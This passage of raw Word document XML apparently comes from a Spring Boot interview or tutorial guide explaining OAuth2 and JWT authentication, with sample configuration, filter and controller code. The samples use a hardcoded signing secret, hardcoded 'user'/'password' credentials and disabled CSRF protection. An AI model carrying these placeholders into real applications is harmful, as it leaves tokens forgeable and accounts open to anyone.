        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F67FB53"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2.0 Authorization Server in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6055E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55A5BC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AuthorizationServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242A3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AuthorizationServerConfig extends AuthorizationServerConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619154EB" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7396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3060E8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void configure(AuthorizationServerSecurityConfigurer security) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B49A6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security.tokenKeyAccess("permitAll()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94A91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checkTokenAccess("isAuthenticated()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112827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C6F3168" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C73D2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5681908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 xml:space="preserve">    public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43926DF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endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390D4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enticationManager(authenticationManager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626A9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tokenStore(tokenStore());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431AC8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10B564DB" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EAF1E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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F550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TokenStore tokenStore() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7CEDA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new InMemoryTokenStore();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5841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5C996C8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04E6434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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4102049D"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 xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, you can integrate OAuth using spring-boot-starter-oauth2-client for handling external OAuth providers (Google, Facebook, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7D3E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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps you configure OAuth2 login, manage tokens, and secure endpoints in your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE94892"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flow includes user authentication, access token exchange, and resource access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CD498" w14:textId="56284837" w:rsidR="00844F85" w:rsidRPr="00CE4B9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61" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94A461" w14:textId="27B0EF0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90" w:name="_Toc197867704"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain JWT in detail in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p w14:paraId="0C0FEFB9" w14:textId="4AFB7784" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="00CF3949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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JWT (JSON Web Token)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C55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JWT consists of three parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BB492"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Contains the type of token (JWT) and the signing algorithm (e.g., HMAC SHA256 or RSA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BB0CD3"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ontains the claims, which are statements about an entity (usually the user) and additional data. Claims can be of three types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7AE94"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gistered Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Predefined claims like iss (issuer), exp (expiration time), and sub (subject).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2138E2"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Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Claims that can be freely defined by anyone but should be collision-resistant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B901D20"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laims</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Claims that are shared between the sender and receiver and are not registered or public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA4B77"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Used to verify that the sender of the JWT is who it says it is and to ensure the message wasn't tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDCB0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WT structure is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091B6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der.Payload.Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611C2E2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re:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124530F"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xml:space="preserve"> is Base64Url encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399330B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xml:space="preserve"> is Base64Url encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0437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xml:space="preserve"> is generated by signing the header and payload using a secret key or private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E89FB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WT in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474422D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Implement JWT Authentication in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A74F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4D064F5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dd the following dependencies to your pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EC9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6626CC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798EEFD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7B92E61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4D92C1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t;artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218F28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21DF65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2816A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io.jsonwebtoken&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3C3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jjwt&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C393C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version&gt;0.11.5&lt;/version&gt;  &lt;!-- Or latest version --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670816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C6724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5BE4CA7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7338F0F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spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A80A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5BE2F7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4C2F7E8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dle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551712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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136878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security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9CF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io.jsonwebtoken:jjwt:0.11.5'  // Or latest version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190FE0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web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D3CD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3BAB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WT Utility Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF5B5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lass will handle the creation and parsing of JWT tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1114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Jwts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C0620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SignatureAlgorithm;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D77D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Date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B5005" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE98C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Util {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B79667" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C11A4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secretKey = "yourSecretKey"; // Secret key for signing the JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5FC65" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7110A0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nerate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEF2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nerateToken(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7501BD0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builder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE701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ubject(username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF10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IssuedAt(new Date())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8BB8A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Expiration(new Date(System.currentTimeMillis() + 1000 * 60 * 60))  // Token valid for 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37FC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gnWith(SignatureAlgorithm.HS256, secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA6FB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mpact();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD25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33DD8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C88732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username from JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B606A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extractUsername(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A98C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4832D44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107133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67791A3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2BF0A0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Subject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F0D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CEEFE9" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D6BF3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JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71BD4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validateToken(String token, String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487623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username.equals(extractUsername(token)) &amp;&amp; !isTokenExpired(token));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F866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4310B3" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E49E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token is expired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA67F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boolean isTokenExpired(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556253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xtractExpiration(token).before(new Date());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F217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2424EF" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA98F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expiration date from JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF722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ate extractExpiration(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9160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0CCE7D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8C0063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29BA5D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6D9DAC2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Expiration();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E14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3D3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A10265"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JWT Filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E582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lter to intercept the incoming requests and check for a valid JWT token in the Authorization header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD6AD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re.context.SecurityContextHolder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8835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filter.OncePerRequestFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594731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Chain;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B486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ServletException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA503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quest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3BF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sponse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942A8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D45BA83" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771139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Filter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE9AFA" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131C48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3F109550" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3CF82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JwtFilter(JwtUtil jwtUtil) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1007CA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15E4F9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575B98" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6193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05C32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doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain filterChain) throws ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1505A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oken = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D861608" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C08064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oken != null &amp;&amp; token.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE49A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ken = token.substring(7); // Remove "Bearer " prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F142E6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sername = jwtUtil.extractUsername(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444DD2B" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E5737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 != null &amp;&amp; SecurityContextHolder.getContext().getAuthentication() == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C7D7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jwtUtil.validateToken(token, username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B53B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uthentication object and set it in the context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD78B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namePasswordAuthenticationToken authentication = new UsernamePasswordAuthenticationToken(username, null, new ArrayList&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBD2A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urityContextHolder.getContext().setAuthentication(authentication);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E0F6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8223C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A48EE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0BBB9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Chain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28711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836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2A0E6CE"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ecurity Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C360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lass, you configure Spring Security to use the JWT filter for every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C80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Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC668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Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2660E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authentication.AuthenticationManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57611EC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authentication.builders.AuthenticationManagerBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E627A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springframework.security.config.annotation.web.builders.HttpSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C4B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EnableWebSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74449CE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WebSecurityConfigurerAdapter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07457623" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED1D33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29FB44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WebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4BBF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curityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C1CAA" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6424A47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6CC622B3" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082E131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ecurityConfig(JwtUtil jwtUtil) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9ECF6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6987031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8EB2C4" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6CFD7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C45A10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configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EF2E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ttp.csrf().disable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9DA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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741D0A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tMatchers("/login").permitAll()  // Public endpoint for login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF501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yRequest().authenticated()     // All other endpoints need authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E07AF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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB26A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ilter(new JwtFilter(jwtUtil)); // Add JWT filter for every request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167DB4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3BBC8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F57E01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3BC21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492DFD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uthenticationManager authenticationManagerBean() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A277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authenticationManagerBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6EF3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3B4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560977"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uthentication Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5E6C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n endpoint where users can log in, and a JWT token is generated upon successful authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B645F1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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A142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apping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B9C0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ethod;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EE7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stController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96BF1A" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742E0C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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A481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uthenticationController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331068E6" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1795143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D35B2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200583B9" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9B049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questMapping(value = "/login", method = RequestMethod.POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BA0B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createJwtToken(String username, String password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15209AF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user credentials (you can integrate with a user service here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE5C8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user") &amp;&amp; password.equals("password")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704AB1D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Util.generateToken(username);  // Generate and return JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C966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24E6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valid credentials";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA4E2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850FB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91914"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Accessing Protected Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303EB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hen accessing any protected endpoint, users need to provide the Authorization header with the JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862388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B1F4D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 /protected-resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9A22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Bearer &lt;JWT_TOKEN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF0A2F"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esting the JWT Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636A09D"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 call the /login endpoint with valid credentials to get the JWT token.</w:t>
      </w:r>
    </w:p>
